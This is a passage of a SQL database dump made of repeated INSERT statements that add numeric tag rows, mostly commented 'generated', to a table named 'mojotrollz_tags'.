1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1756, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1763, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1763, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1763, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1764, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1765, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1765, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1766, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1766, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1767, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1767, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1768, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1768, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1769, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1769, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1770, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1770, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1772, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1772, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1773, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1773, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1775, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1775, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1776, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1776, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1777, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1777, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1778, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1778, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1779, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1779, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1780, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1780, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1781, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1781, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1782, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1782, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1783, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1783, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1784, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1784, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1785, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1785, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1787, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1787, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1788, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1788, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1789, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1789, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1791, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1791, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1793, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1793, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1794, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1794, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1795, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1795, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1796, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1796, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1797, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1797, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1800, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1801, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1802, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1802, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1804, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1804, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1805, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1805, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1806, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1806, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1808, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1808, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1809, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1809, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1812, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1812, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1813, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1813, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1815, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1815, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1816, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1816, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1817, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1817, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1821, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1821, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1822, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1822, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1824, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1824, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1826, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1826, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1827, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1827, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1831, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1831, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1832, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1832, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1833, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1833, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1834, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1834, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1835, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1835, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1836, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1836, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1837, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1837, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1838, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1838, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1839, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1839, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1840, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1841, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1841, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1842, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1842, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1843, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1843, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1844, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1844, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1845, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1845, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1846, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1846, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1847, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1847, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1848, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1848, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1850, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1850, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1851, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1851, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1852, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1852, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1853, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1854, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1854, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1855, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1855, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1860, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1863, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1865, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1865, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1866, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1866, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1867, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1867, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1868, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1868, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1869, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1869, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1870, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1870, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1871, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1872, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1872, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1880, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1883, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1883, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1884, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1884, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1885, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1885, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1888, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1888, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1889, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1889, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1890, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1890, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1891, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1891, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1892, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1892, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1893, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1893, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1894, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1894, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1895, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1895, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1896, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1896, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1901, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1901, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1907, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1907, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1908, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1908, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1909, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1909, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1910, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1910, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1911, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1911, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1912, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1912, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1913, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1913, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1914, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1914, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1915, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1915, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1916, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1916, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1917, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1917, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1918, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1918, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1919, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1919, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1920, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1920, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1921, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1922, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1922, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1923, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1923, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1924, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1924, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1931, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1931, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1933, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1933, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1934, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1934, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1935, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1935, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1936, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1936, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1937, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1937, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1938, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1938, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1939, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1939, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1940, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1940, 1, 30, 